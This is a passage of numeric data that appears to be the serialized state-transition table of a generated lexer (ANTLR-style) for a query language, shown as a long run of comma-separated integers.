0, 198, 1079, 1, 0, 0, 0, 200, 1084, 1, 0, 0, 0, 202, 1115, 1, 0, 0, 0, 204, 1118, 1, 0, 0, 0, 206, 1164, 1, 0, 0, 0, 208, 1166, 1, 0, 0, 0, 210, 1170, 1, 0, 0, 0, 212, 1174, 1, 0, 0, 0, 214, 1176, 1, 0, 0, 0, 216, 1179, 1, 0, 0, 0, 218, 1182, 1, 0, 0, 0, 220, 1184, 1, 0, 0, 0, 222, 1186, 1, 0, 0, 0, 224, 1191, 1, 0, 0, 0, 226, 1193, 1, 0, 0, 0, 228, 1199, 1, 0, 0, 0, 230, 1205, 1, 0, 0, 0, 232, 1208, 1, 0, 0, 0, 234, 1211, 1, 0, 0, 0, 236, 1216, 1, 0, 0, 0, 238, 1221, 1, 0, 0, 0, 240, 1225, 1, 0, 0, 0, 242, 1230, 1, 0, 0, 
0, 244, 1236, 1, 0, 0, 0, 246, 1239, 1, 0, 0, 0, 248, 1242, 1, 0, 0, 0, 250, 1244, 1, 0, 0, 0, 252, 1250, 1, 0, 0, 0, 254, 1255, 1, 0, 0, 0, 256, 1260, 1, 0, 0, 0, 258, 1263, 1, 0, 0, 0, 260, 1266, 1, 0, 0, 0, 262, 1269, 1, 0, 0, 0, 264, 1271, 1, 0, 0, 0, 266, 1274, 1, 0, 0, 0, 268, 1276, 1, 0, 0, 0, 270, 1279, 1, 0, 0, 0, 272, 1281, 1, 0, 0, 0, 274, 1283, 1, 0, 0, 0, 276, 1285, 1, 0, 0, 0, 278, 1287, 1, 0, 0, 0, 280, 1289, 1, 0, 0, 0, 282, 1291, 1, 0, 0, 0, 284, 1293, 1, 0, 0, 0, 286, 1296, 1, 0, 0, 0, 288, 1317, 1, 0, 0, 0, 290, 1336, 1, 0, 0, 0, 292, 1338, 1, 0, 0, 0, 294, 1343, 1, 0, 0, 0, 296, 1348, 1, 0, 0, 0, 298, 1353, 1, 0, 0, 0, 300, 1374, 1, 0, 0, 0, 302, 1376, 1, 0, 0, 0, 304, 1384, 1, 0, 0, 0, 306, 1386, 1, 0, 0, 0, 308, 1390, 1, 0, 0, 0, 310, 1394, 1, 0, 0, 0, 312, 1398, 1, 0, 0, 0, 314, 1403, 1, 0, 0, 0, 316, 1407, 1, 0, 0, 0, 318, 1411, 1, 0, 0, 0, 320, 1415, 1, 0, 0, 0, 322, 1419, 1, 0, 0, 0, 324, 1423, 1, 0, 0, 0, 326, 1427, 1, 0, 0, 0, 328, 1436, 1, 0, 0, 0, 330, 1444, 1, 0, 0, 0, 332, 1447, 1, 0, 0, 0, 334, 1451, 1, 0, 0, 0, 336, 1455, 1, 0, 0, 0, 338, 1459, 1, 0, 0, 0, 340, 1463, 1, 0, 0, 0, 342, 1467, 1, 0, 0, 0, 344, 1471, 1, 0, 0, 0, 346, 1476, 1, 0, 0, 0, 348, 1482, 1, 0, 0, 0, 350, 1487, 1, 0, 0, 0, 352, 1491, 1, 0, 0, 0, 354, 1495, 1, 0, 0, 0, 356, 1499, 1, 0, 0, 0, 358, 1504, 1, 0, 0, 0, 360, 1509, 1, 0, 0, 0, 362, 1513, 1, 0, 0, 0, 364, 1519, 1, 0, 0, 0, 366, 1528, 1, 0, 0, 0, 368, 1532, 1, 0, 0, 0, 370, 1536, 1, 0, 0, 0, 372, 1540, 1, 0, 0, 0, 374, 1544, 1, 0, 0, 0, 376, 1548, 1, 0, 0, 0, 378, 1552, 1, 0, 0, 0, 380, 1556, 1, 0, 0, 0, 382, 1560, 1, 0, 0, 0, 384, 1565, 1, 0, 0, 0, 386, 1571, 1, 0, 0, 0, 388, 1575, 1, 0, 0, 0, 390, 1579, 1, 0, 0, 0, 392, 1583, 1, 0, 0, 0, 394, 1588, 1, 0, 0, 0, 396, 1592, 1, 0, 0, 0, 398, 1596, 1, 0, 0, 0, 400, 1600, 1, 0, 0, 0, 402, 1604, 1, 0, 0, 0, 404, 1608, 1, 0, 0, 0, 406, 1614, 1, 0, 0, 0, 408, 1621, 1, 0, 0, 0, 410, 1625, 1, 0, 0, 0, 412, 1629, 1, 0, 0, 0, 414, 1633, 1, 0, 0, 0, 416, 1637, 1, 0, 0, 0, 418, 1641, 1, 0, 0, 0, 420, 1645, 1, 0, 0, 0, 422, 1650, 1, 0, 0, 0, 424, 1656, 1, 0, 0, 0, 426, 1660, 1, 0, 0, 0, 428, 1664, 1, 0, 0, 0, 430, 1668, 1, 0, 0, 0, 432, 1672, 1, 0, 0, 0, 434, 1676, 1, 0, 0, 0, 436, 1680, 1, 0, 0, 0, 438, 1684, 1, 0, 0, 0, 440, 1688, 1, 0, 0, 0, 442, 1692, 1, 0, 0, 0, 444, 1696, 1, 0, 0, 0, 446, 1701, 1, 0, 0, 0, 448, 1707, 1, 0, 0, 0, 450, 1711, 1, 0, 0, 0, 452, 1715, 1, 0, 0, 0, 454, 1719, 1, 0, 0, 0, 456, 1723, 1, 0, 0, 0, 458, 1727, 1, 0, 0, 0, 460, 1735, 1, 0, 0, 0, 462, 1756, 1, 0, 0, 0, 464, 1760, 1, 0, 0, 0, 466, 1764, 1, 0, 0, 0, 468, 1768, 1, 0, 0, 0, 470, 1772, 1, 0, 0, 0, 472, 1776, 1, 0, 0, 0, 474, 1781, 1, 0, 0, 0, 476, 1787, 1, 0, 0, 0, 478, 1791, 1, 0, 0, 0, 480, 1795, 1, 0, 0, 0, 482, 1799, 1, 0, 0, 0, 484, 1803, 1, 0, 0, 0, 486, 1807, 1, 0, 0, 0, 488, 1811, 1, 0, 0, 0, 490, 1815, 1, 0, 0, 0, 492, 1818, 1, 0, 0, 0, 494, 1822, 1, 0, 0, 0, 496, 1826, 1, 0, 0, 0, 498, 1830, 1, 0, 0, 0, 500, 1834, 1, 0, 0, 0, 502, 1839, 1, 0, 0, 0, 504, 1844, 1, 0, 0, 0, 506, 1848, 1, 0, 0, 0, 508, 1852, 1, 0, 0, 0, 510, 511, 5, 47, 0, 0, 511, 512, 5, 47, 0, 0, 512, 516, 1, 0, 0, 0, 513, 515, 8, 0, 0, 0, 514, 513, 1, 0, 0, 0, 515, 518, 1, 0, 0, 0, 516, 514, 1, 0, 0, 0, 516, 517, 1, 0, 0, 0, 517, 520, 1, 0, 0, 0, 518, 516, 1, 0, 0, 0, 519, 521, 5, 13, 0, 0, 520, 519, 1, 0, 0, 0, 520, 521, 1, 0, 0, 0, 521, 523, 1, 0, 0, 0, 522, 524, 5, 10, 0, 0, 523, 522, 1, 0, 0, 0, 523, 524, 1, 0, 0, 0, 524, 525, 1, 0, 0, 0, 525, 526, 6, 0, 0, 0, 526, 17, 1, 0, 0, 0, 527, 528, 5, 47, 0, 0, 528, 529, 5, 42, 0, 0, 
529, 534, 1, 0, 0, 0, 530, 533, 3, 18, 1, 0, 531, 533, 9, 0, 0, 0, 532, 530, 1, 0, 0, 0, 532, 531, 1, 0, 0, 0, 533, 536, 1, 0, 0, 0, 534, 535, 1, 0, 0, 0, 534, 532, 1, 0, 0, 0, 535, 537, 1, 0, 0, 0, 536, 534, 1, 0, 0, 0, 537, 538, 5, 42, 0, 0, 538, 539, 5, 47, 0, 0, 539, 540, 1, 0, 0, 0, 540, 541, 6, 1, 0, 0, 541, 19, 1, 0, 0, 0, 542, 544, 7, 1, 0, 0, 543, 542, 1, 0, 0, 0, 544, 545, 1, 0, 0, 0, 545, 543, 1, 0, 0, 0, 545, 546, 1, 0, 0, 0, 546, 547, 1, 0, 0, 0, 547, 548, 6, 2, 0, 0, 548, 21, 1, 0, 0, 0, 549, 550, 7, 2, 0, 0, 550, 551, 7, 3, 0, 0, 551, 552, 7, 4, 0, 0, 552, 553, 7, 5, 0, 0, 553, 554, 7, 6, 0, 0, 554, 555, 7, 7, 0, 0, 555, 556, 5, 95, 0, 0, 556, 557, 7, 8, 0, 0, 557, 558, 7, 9, 0, 0, 558, 559, 7, 10, 0, 0, 559, 560, 7, 5, 0, 0, 560, 561, 7, 11, 0, 0, 561, 562, 1, 0, 0, 0, 562, 563, 6, 3, 1, 0, 563, 23, 1, 0, 0, 0, 564, 565, 7, 7, 0, 0, 565, 566, 7, 5, 0, 0, 566, 567, 7, 12, 0, 0, 567, 568, 7, 10, 0, 0, 568, 569, 7, 2, 0, 0, 569, 570, 7, 3, 0, 0, 570, 571, 1, 0, 0, 0, 571, 572, 6, 4, 2, 0, 572, 25, 1, 0, 0, 0, 573, 574, 4, 5, 0, 0, 574, 575, 7, 7, 0, 0, 575, 576, 7, 13, 0, 0, 576, 577, 7, 8, 0, 0, 577, 578, 7, 14, 0, 0, 578, 579, 7, 4, 0, 0, 579, 580, 7, 10, 0, 0, 580, 581, 7, 5, 0, 0, 581, 582, 1, 0, 0, 0, 582, 583, 6, 5, 3, 0, 583, 27, 1, 0, 0, 0, 584, 585, 7, 2, 0, 0, 585, 586, 7, 9, 0, 0, 586, 587, 7, 15, 0, 0, 587, 588, 7, 8, 0, 0, 588, 589, 7, 14, 0, 0, 589, 590, 7, 7, 0, 0, 590, 591, 7, 11, 0, 0, 591, 592, 7, 10, 0, 0, 592, 593, 7, 9, 0, 0, 593, 594, 7, 5, 0, 0, 594, 595, 1, 0, 0, 0, 595, 596, 6, 6, 4, 0, 596, 29, 1, 0, 0, 0, 597, 598, 7, 16, 0, 0, 598, 599, 7, 10, 0, 0, 599, 600, 7, 17, 0, 0, 600, 601, 7, 17, 0, 0, 601, 602, 7, 7, 0, 0, 602, 603, 7, 2, 0, 0, 603, 604, 7, 11, 0, 0, 604, 605, 1, 0, 0, 0, 605, 606, 6, 7, 4, 0, 606, 31, 1, 0, 0, 0, 607, 608, 7, 7, 0, 0, 608, 609, 7, 18, 0, 0, 609, 610, 7, 4, 0, 0, 610, 611, 7, 14, 0, 0, 611, 612, 1, 0, 0, 0, 612, 613, 6, 8, 4, 0, 613, 33, 1, 0, 0, 0, 614, 615, 7, 6, 0, 0, 615, 616, 7, 12, 0, 0, 616, 617, 7, 9, 0, 0, 617, 618, 7, 19, 0, 0, 618, 619, 1, 0, 0, 0, 619, 620, 6, 9, 4, 0, 620, 35, 1, 0, 0, 0, 621, 622, 7, 14, 0, 0, 622, 623, 7, 10, 0, 0, 623, 624, 7, 15, 0, 0, 624, 625, 7, 10, 0, 0, 625, 626, 7, 11, 0, 0, 626, 627, 1, 0, 0, 0, 627, 628, 6, 10, 4, 0, 628, 37, 1, 0, 0, 0, 629, 630, 7, 12, 0, 0, 630, 631, 7, 9, 0, 0, 631, 632, 7, 20, 0, 0, 632, 633, 1, 0, 0, 0, 633, 634, 6, 11, 4, 0, 634, 39, 1, 0, 0, 0, 635, 636, 7, 17, 0, 0, 636, 637, 7, 4, 0, 0, 637, 638, 7, 15, 0, 0, 638, 639, 7, 8, 0, 0, 639, 640, 7, 14, 0, 0, 640, 641, 7, 7, 0, 0, 641, 642, 1, 0, 0, 0, 642, 643, 6, 12, 4, 0, 643, 41, 1, 0, 0, 0, 644, 645, 7, 17, 0, 0, 645, 646, 7, 9, 0, 0, 646, 647, 7, 12, 0, 0, 647, 648, 7, 11, 0, 0, 648, 649, 1, 0, 0, 0, 649, 650, 6, 13, 4, 0, 650, 43, 1, 0, 0, 0, 651, 652, 7, 17, 0, 0, 652, 653, 7, 11, 0, 0, 653, 654, 7, 4, 0, 0, 654, 655, 7, 11, 0, 0, 655, 656, 7, 17, 0, 0, 656, 657, 1, 0, 0, 0, 657, 658, 6, 14, 4, 0, 658, 45, 1, 0, 0, 0, 659, 660, 7, 20, 0, 0, 660, 661, 7, 3, 0, 0, 661, 662, 7, 7, 0, 0, 662, 663, 7, 12, 0, 0, 663, 664, 7, 7, 0, 0, 664, 665, 1, 0, 0, 0, 665, 666, 6, 15, 4, 0, 666, 47, 1, 0, 0, 0, 667, 668, 4, 16, 1, 0, 668, 669, 7, 10, 0, 0, 669, 670, 7, 5, 0, 0, 670, 671, 7, 14, 0, 0, 671, 672, 7, 10, 0, 0, 672, 673, 7, 5, 0, 0, 673, 674, 7, 7, 0, 0, 674, 675, 7, 17, 0, 0, 675, 676, 7, 11, 0, 0, 676, 677, 7, 4, 0, 0, 677, 678, 7, 11, 0, 0, 678, 679, 7, 17, 0, 0, 679, 680, 1, 0, 0, 0, 680, 681, 6, 16, 4, 0, 681, 49, 1, 0, 0, 0, 682, 683, 4, 17, 2, 0, 683, 684, 7, 12, 0, 0, 684, 685, 7, 7, 0, 0, 685, 686, 7, 
12, 0, 0, 686, 687, 7, 4, 0, 0, 687, 688, 7, 5, 0, 0, 688, 689, 7, 19, 0, 0, 689, 690, 1, 0, 0, 0, 690, 691, 6, 17, 4, 0, 691, 51, 1, 0, 0, 0, 692, 693, 7, 21, 0, 0, 693, 694, 7, 12, 0, 0, 694, 695, 7, 9, 0, 0, 695, 696, 7, 15, 0, 0, 696, 697, 1, 0, 0, 0, 697, 698, 6, 18, 5, 0, 698, 53, 1, 0, 0, 0, 699, 700, 4, 19, 3, 0, 700, 701, 7, 11, 0, 0, 701, 702, 7, 17, 0, 0, 702, 703, 1, 0, 0, 0, 703, 704, 6, 19, 5, 0, 704, 55, 1, 0, 0, 0, 705, 706, 7, 21, 0, 0, 706, 707, 7, 9, 0, 0, 707, 708, 7, 12, 0, 0, 708, 709, 7, 19, 0, 0, 709, 710, 1, 0, 0, 0, 710, 711, 6, 20, 6, 0, 711, 57, 1, 0, 0, 0, 712, 713, 7, 14, 0, 0, 713, 714, 7, 9, 0, 0, 714, 715, 7, 9, 0, 0, 715, 716, 7, 19, 0, 0, 716, 717, 7, 22, 0, 0, 717, 718, 7, 8, 0, 0, 718, 719, 1, 0, 0, 0, 719, 720, 6, 21, 7, 0, 720, 59, 1, 0, 0, 0, 721, 722, 4, 22, 4, 0, 722, 723, 7, 21, 0, 0, 723, 724, 7, 22, 0, 0, 724, 725, 7, 14, 0, 0, 725, 726, 7, 14, 0, 0, 726, 727, 1, 0, 0, 0, 727, 728, 6, 22, 7, 0, 728, 61, 1, 0, 0, 0, 729, 730, 4, 23, 5, 0, 730, 731, 7, 14, 0, 0, 731, 732, 7, 7, 0, 0, 732, 733, 7, 21, 0, 0, 733, 734, 7, 11, 0, 0, 734, 735, 1, 0, 0, 0, 735, 736, 6, 23, 7, 0, 736, 63, 1, 0, 0, 0, 737, 738, 4, 24, 6, 0, 738, 739, 7, 12, 0, 0, 739, 740, 7, 10, 0, 0, 740, 741, 7, 6, 0, 0, 741, 742, 7, 3, 0, 0, 742, 743, 7, 11, 0, 0, 743, 744, 1, 0, 0, 0, 744, 745, 6, 24, 7, 0, 745, 65, 1, 0, 0, 0, 746, 747, 4, 25, 7, 0, 747, 748, 7, 14, 0, 0, 748, 749, 7, 9, 0, 0, 749, 750, 7, 9, 0, 0, 750, 751, 7, 19, 0, 0, 751, 752, 7, 22, 0, 0, 752, 753, 7, 8, 0, 0, 753, 754, 5, 95, 0, 0, 754, 755, 5, 128020, 0, 0, 755, 756, 1, 0, 0, 0, 756, 757, 6, 25, 8, 0, 757, 67, 1, 0, 0, 0, 758, 759, 7, 15, 0, 0, 759, 760, 7, 18, 0, 0, 760, 761, 5, 95, 0, 0, 761, 762, 7, 7, 0, 0, 762, 763, 7, 13, 0, 0, 763, 764, 7, 8, 0, 0, 764, 765, 7, 4, 0, 0, 765, 766, 7, 5, 0, 0, 766, 767, 7, 16, 0, 0, 767, 768, 1, 0, 0, 0, 768, 769, 6, 26, 9, 0, 769, 69, 1, 0, 0, 0, 770, 771, 7, 16, 0, 0, 771, 772, 7, 12, 0, 0, 772, 773, 7, 9, 0, 0, 773, 774, 7, 8, 0, 0, 774, 775, 1, 0, 0, 0, 775, 776, 6, 27, 10, 0, 776, 71, 1, 0, 0, 0, 777, 778, 7, 19, 0, 0, 778, 779, 7, 7, 0, 0, 779, 780, 7, 7, 0, 0, 780, 781, 7, 8, 0, 0, 781, 782, 1, 0, 0, 0, 782, 783, 6, 28, 10, 0, 783, 73, 1, 0, 0, 0, 784, 785, 4, 29, 8, 0, 785, 786, 7, 10, 0, 0, 786, 787, 7, 5, 0, 0, 787, 788, 7, 17, 0, 0, 788, 789, 7, 10, 0, 0, 789, 790, 7, 17, 0, 0, 790, 791, 7, 11, 0, 0, 791, 792, 5, 95, 0, 0, 792, 793, 5, 128020, 0, 0, 793, 794, 1, 0, 0, 0, 794, 795, 6, 29, 10, 0, 795, 75, 1, 0, 0, 0, 796, 797, 4, 30, 9, 0, 797, 798, 7, 12, 0, 0, 798, 799, 7, 12, 0, 0, 799, 800, 7, 21, 0, 0, 800, 801, 1, 0, 0, 0, 801, 802, 6, 30, 4, 0, 802, 77, 1, 0, 0, 0, 803, 804, 7, 12, 0, 0, 804, 805, 7, 7, 0, 0, 805, 806, 7, 5, 0, 0, 806, 807, 7, 4, 0, 0, 807, 808, 7, 15, 0, 0, 808, 809, 7, 7, 0, 0, 809, 810, 1, 0, 0, 0, 810, 811, 6, 31, 11, 0, 811, 79, 1, 0, 0, 0, 812, 813, 7, 17, 0, 0, 813, 814, 7, 3, 0, 0, 814, 815, 7, 9, 0, 0, 815, 816, 7, 20, 0, 0, 816, 817, 1, 0, 0, 0, 817, 818, 6, 32, 12, 0, 818, 81, 1, 0, 0, 0, 819, 821, 8, 23, 0, 0, 820, 819, 1, 0, 0, 0, 821, 822, 1, 0, 0, 0, 822, 820, 1, 0, 0, 0, 822, 823, 1, 0, 0, 0, 823, 824, 1, 0, 0, 0, 824, 825, 6, 33, 4, 0, 825, 83, 1, 0, 0, 0, 826, 827, 3, 180, 82, 0, 827, 828, 1, 0, 0, 0, 828, 829, 6, 34, 13, 0, 829, 830, 6, 34, 14, 0, 830, 85, 1, 0, 0, 0, 831, 832, 3, 298, 141, 0, 832, 833, 1, 0, 0, 0, 833, 834, 6, 35, 15, 0, 834, 835, 6, 35, 14, 0, 835, 836, 6, 35, 14, 0, 836, 87, 1, 0, 0, 0, 837, 838, 3, 244, 114, 0, 838, 839, 1, 0, 0, 0, 839, 840, 6, 36, 16, 0, 840, 89, 1, 0, 0, 0, 841, 842, 3, 490, 237, 
0, 842, 843, 1, 0, 0, 0, 843, 844, 6, 37, 17, 0, 844, 91, 1, 0, 0, 0, 845, 846, 3, 224, 104, 0, 846, 847, 1, 0, 0, 0, 847, 848, 6, 38, 18, 0, 848, 93, 1, 0, 0, 0, 849, 850, 3, 220, 102, 0, 850, 851, 1, 0, 0, 0, 851, 852, 6, 39, 19, 0, 852, 95, 1, 0, 0, 0, 853, 854, 3, 304, 144, 0, 854, 855, 1, 0, 0, 0, 855, 856, 6, 40, 20, 0, 856, 97, 1, 0, 0, 0, 857, 858, 3, 300, 142, 0, 858, 859, 1, 0, 0, 0, 859, 860, 6, 41, 21, 0, 860, 99, 1, 0, 0, 0, 861, 862, 3, 16, 0, 0, 862, 863, 1, 0, 0, 0, 863, 864, 6, 42, 0, 0, 864, 101, 1, 0, 0, 0, 865, 866, 3, 18, 1, 0, 866, 867, 1, 0, 0, 0, 867, 868, 6, 43, 0, 0, 868, 103, 1, 0, 0, 0, 869, 870, 3, 20, 2, 0, 870, 871, 1, 0, 0, 0, 871, 872, 6, 44, 0, 0, 872, 105, 1, 0, 0, 0, 873, 874, 3, 180, 82, 0, 874, 875, 1, 0, 0, 0, 875, 876, 6, 45, 13, 0, 876, 877, 6, 45, 14, 0, 877, 107, 1, 0, 0, 0, 878, 879, 3, 298, 141, 0, 879, 880, 1, 0, 0, 0, 880, 881, 6, 46, 15, 0, 881, 882, 6, 46, 14, 0, 882, 883, 6, 46, 14, 0, 883, 109, 1, 0, 0, 0, 884, 885, 3, 292, 138, 0, 885, 886, 1, 0, 0, 0, 886, 887, 6, 47, 22, 0, 887, 888, 6, 47, 23, 0, 888, 111, 1, 0, 0, 0, 889, 890, 3, 244, 114, 0, 890, 891, 1, 0, 0, 0, 891, 892, 6, 48, 16, 0, 892, 893, 6, 48, 24, 0, 893, 113, 1, 0, 0, 0, 894, 895, 3, 254, 119, 0, 895, 896, 1, 0, 0, 0, 896, 897, 6, 49, 25, 0, 897, 898, 6, 49, 24, 0, 898, 115, 1, 0, 0, 0, 899, 900, 8, 24, 0, 0, 900, 117, 1, 0, 0, 0, 901, 903, 3, 116, 50, 0, 902, 901, 1, 0, 0, 0, 903, 904, 1, 0, 0, 0, 904, 902, 1, 0, 0, 0, 904, 905, 1, 0, 0, 0, 905, 906, 1, 0, 0, 0, 906, 907, 3, 218, 101, 0, 907, 909, 1, 0, 0, 0, 908, 902, 1, 0, 0, 0, 908, 909, 1, 0, 0, 0, 909, 911, 1, 0, 0, 0, 910, 912, 3, 116, 50, 0, 911, 910, 1, 0, 0, 0, 912, 913, 1, 0, 0, 0, 913, 911, 1, 0, 0, 0, 913, 914, 1, 0, 0, 0, 914, 119, 1, 0, 0, 0, 915, 916, 3, 118, 51, 0, 916, 917, 1, 0, 0, 0, 917, 918, 6, 52, 26, 0, 918, 121, 1, 0, 0, 0, 919, 920, 3, 16, 0, 0, 920, 921, 1, 0, 0, 0, 921, 922, 6, 53, 0, 0, 922, 123, 1, 0, 0, 0, 923, 924, 3, 18, 1, 0, 924, 925, 1, 0, 0, 0, 925, 926, 6, 54, 0, 0, 926, 125, 1, 0, 0, 0, 927, 928, 3, 20, 2, 0, 928, 929, 1, 0, 0, 0, 929, 930, 6, 55, 0, 0, 930, 127, 1, 0, 0, 0, 931, 932, 3, 180, 82, 0, 932, 933, 1, 0, 0, 0, 933, 934, 6, 56, 13, 0, 934, 935, 6, 56, 14, 0, 935, 936, 6, 56, 14, 0, 936, 129, 1, 0, 0, 0, 937, 938, 3, 298, 141, 0, 938, 939, 1, 0, 0, 0, 939, 940, 6, 57, 15, 0, 940, 941, 6, 57, 14, 0, 941, 942, 6, 57, 14, 0, 942, 943, 6, 57, 14, 0, 943, 131, 1, 0, 0, 0, 944, 945, 3, 212, 98, 0, 945, 946, 1, 0, 0, 0, 946, 947, 6, 58, 27, 0, 947, 133, 1, 0, 0, 0, 948, 949, 3, 220, 102, 0, 949, 950, 1, 0, 0, 0, 950, 951, 6, 59, 19, 0, 951, 135, 1, 0, 0, 0, 952, 953, 3, 224, 104, 0, 953, 954, 1, 0, 0, 0, 954, 955, 6, 60, 18, 0, 955, 137, 1, 0, 0, 0, 956, 957, 3, 254, 119, 0, 957, 958, 1, 0, 0, 0, 958, 959, 6, 61, 25, 0, 959, 139, 1, 0, 0, 0, 960, 961, 3, 464, 224, 0, 961, 962, 1, 0, 0, 0, 962, 963, 6, 62, 28, 0, 963, 141, 1, 0, 0, 0, 964, 965, 3, 304, 144, 0, 965, 966, 1, 0, 0, 0, 966, 967, 6, 63, 20, 0, 967, 143, 1, 0, 0, 0, 968, 969, 3, 248, 116, 0, 969, 970, 1, 0, 0, 0, 970, 971, 6, 64, 29, 0, 971, 145, 1, 0, 0, 0, 972, 973, 3, 288, 136, 0, 973, 974, 1, 0, 0, 0, 974, 975, 6, 65, 30, 0, 975, 147, 1, 0, 0, 0, 976, 977, 3, 284, 134, 0, 977, 978, 1, 0, 0, 0, 978, 979, 6, 66, 31, 0, 979, 149, 1, 0, 0, 0, 980, 981, 3, 290, 137, 0, 981, 982, 1, 0, 0, 0, 982, 983, 6, 67, 32, 0, 983, 151, 1, 0, 0, 0, 984, 985, 3, 16, 0, 0, 985, 986, 1, 0, 0, 0, 986, 987, 6, 68, 0, 0, 987, 153, 1, 0, 0, 0, 988, 989, 3, 18, 1, 0, 989, 990, 1, 0, 0, 0, 990, 991, 6, 69, 0, 0, 991, 155, 1, 0, 0, 0, 992, 993, 
3, 20, 2, 0, 993, 994, 1, 0, 0, 0, 994, 995, 6, 70, 0, 0, 995, 157, 1, 0, 0, 0, 996, 997, 3, 294, 139, 0, 997, 998, 1, 0, 0, 0, 998, 999, 6, 71, 33, 0, 999, 1000, 6, 71, 14, 0, 1000, 159, 1, 0, 0, 0, 1001, 1002, 3, 218, 101, 0, 1002, 1003, 1, 0, 0, 0, 1003, 1004, 6, 72, 34, 0, 1004, 161, 1, 0, 0, 0, 1005, 1011, 3, 192, 88, 0, 1006, 1011, 3, 182, 83, 0, 1007, 1011, 3, 224, 104, 0, 1008, 1011, 3, 184, 84, 0, 1009, 1011, 3, 198, 91, 0, 1010, 1005, 1, 0, 0, 0, 1010, 1006, 1, 0, 0, 0, 1010, 1007, 1, 0, 0, 0, 1010, 1008, 1, 0, 0, 0, 1010, 1009, 1, 0, 0, 0, 1011, 1012, 1, 0, 0, 0, 1012, 1010, 1, 0, 0, 0, 1012, 1013, 1, 0, 0, 0, 1013, 163, 1, 0, 0, 0, 1014, 1015, 3, 16, 0, 0, 1015, 1016, 1, 0, 0, 0, 1016, 1017, 6, 74, 0, 0, 1017, 165, 1, 0, 0, 0, 1018, 1019, 3, 18, 1, 0, 1019, 1020, 1, 0, 0, 0, 1020, 1021, 6, 75, 0, 0, 1021, 167, 1, 0, 0, 0, 1022, 1023, 3, 20, 2, 0, 1023, 1024, 1, 0, 0, 0, 1024, 1025, 6, 76, 0, 0, 1025, 169, 1, 0, 0, 0, 1026, 1027, 3, 296, 140, 0, 1027, 1028, 1, 0, 0, 0, 1028, 1029, 6, 77, 35, 0, 1029, 1030, 6, 77, 36, 0, 1030, 171, 1, 0, 0, 0, 1031, 1032, 3, 180, 82, 0, 1032, 1033, 1, 0, 0, 0, 1033, 1034, 6, 78, 13, 0, 1034, 1035, 6, 78, 14, 0, 1035, 173, 1, 0, 0, 0, 1036, 1037, 3, 20, 2, 0, 1037, 1038, 1, 0, 0, 0, 1038, 1039, 6, 79, 0, 0, 1039, 175, 1, 0, 0, 0, 1040, 1041, 3, 16, 0, 0, 1041, 1042, 1, 0, 0, 0, 1042, 1043, 6, 80, 0, 0, 1043, 177, 1, 0, 0, 0, 1044, 1045, 3, 18, 1, 0, 1045, 1046, 1, 0, 0, 0, 1046, 1047, 6, 81, 0, 0, 1047, 179, 1, 0, 0, 0, 1048, 1049, 5, 124, 0, 0, 1049, 1050, 1, 0, 0, 0, 1050, 1051, 6, 82, 14, 0, 1051, 181, 1, 0, 0, 0, 1052, 1053, 7, 25, 0, 0, 1053, 183, 1, 0, 0, 0, 1054, 1055, 7, 26, 0, 0, 1055, 185, 1, 0, 0, 0, 1056, 1057, 5, 92, 0, 0, 1057, 1058, 7, 27, 0, 0, 1058, 187, 1, 0, 0, 0, 1059, 1060, 8, 28, 0, 0, 1060, 189, 1, 0, 0, 0, 1061, 1063, 7, 7, 0, 0, 1062, 1064, 7, 29, 0, 0, 1063, 1062, 1, 0, 0, 0, 1063, 1064, 1, 0, 0, 0, 1064, 1066, 1, 0, 0, 0, 1065, 1067, 3, 182, 83, 0, 1066, 1065, 1, 0, 0, 0, 1067, 1068, 1, 0, 0, 0, 1068, 1066, 1, 0, 0, 0, 1068, 1069, 1, 0, 0, 0, 1069, 191, 1, 0, 0, 0, 1070, 1071, 5, 64, 0, 0, 1071, 193, 1, 0, 0, 0, 1072, 1073, 5, 96, 0, 0, 1073, 195, 1, 0, 0, 0, 1074, 1078, 8, 30, 0, 0, 1075, 1076, 5, 96, 0, 0, 1076, 1078, 5, 96, 0, 0, 1077, 1074, 1, 0, 0, 0, 1077, 1075, 1, 0, 0, 0, 1078, 197, 1, 0, 0, 0, 1079, 1080, 5, 95, 0, 0, 1080, 199, 1, 0, 0, 0, 1081, 1085, 3, 184, 84, 0, 1082, 1085, 3, 182, 83, 0, 1083, 1085, 3, 198, 91, 0, 1084, 1081, 1, 0, 0, 0, 1084, 1082, 1, 0, 0, 0, 1084, 1083, 1, 0, 0, 0, 1085, 201, 1, 0, 0, 0, 1086, 1091, 5, 34, 0, 0, 1087, 1090, 3, 186, 85, 0, 1088, 1090, 3, 188, 86, 0, 1089, 1087, 1, 0, 0, 0, 1089, 1088, 1, 0, 0, 0, 1090, 1093, 1, 0, 0, 0, 1091, 1089, 1, 0, 0, 0, 1091, 1092, 1, 0, 0, 0, 1092, 1094, 1, 0, 0, 0, 1093, 1091, 1, 0, 0, 0, 1094, 1116, 5, 34, 0, 0, 1095, 1096, 5, 34, 0, 0, 1096, 1097, 5, 34, 0, 0, 1097, 1098, 5, 34, 0, 0, 1098, 1102, 1, 0, 0, 0, 1099, 1101, 8, 0, 0, 0, 1100, 1099, 1, 0, 0, 0, 1101, 1104, 1, 0, 0, 0, 1102, 1103, 1, 0, 0, 0, 1102, 1100, 1, 0, 0, 0, 1103, 1105, 1, 0, 0, 0, 1104, 1102, 1, 0, 0, 0, 1105, 1106, 5, 34, 0, 0, 1106, 1107, 5, 34, 0, 0, 1107, 1108, 5, 34, 0, 0, 1108, 1110, 1, 0, 0, 0, 1109, 1111, 5, 34, 0, 0, 1110, 1109, 1, 0, 0, 0, 1110, 1111, 1, 0, 0, 0, 1111, 1113, 1, 0, 0, 0, 1112, 1114, 5, 34, 0, 0, 1113, 1112, 1, 0, 0, 0, 1113, 1114, 1, 0, 0, 0, 1114, 1116, 1, 0, 0, 0, 1115, 1086, 1, 0, 0, 0, 1115, 1095, 1, 0, 0, 0, 1116, 203, 1, 0, 0, 0, 1117, 1119, 3, 182, 83, 0, 1118, 1117, 1, 0, 0, 0, 1119, 1120, 1, 0, 0, 0, 1120, 1118, 1, 0, 0, 0, 1120, 1121, 1, 
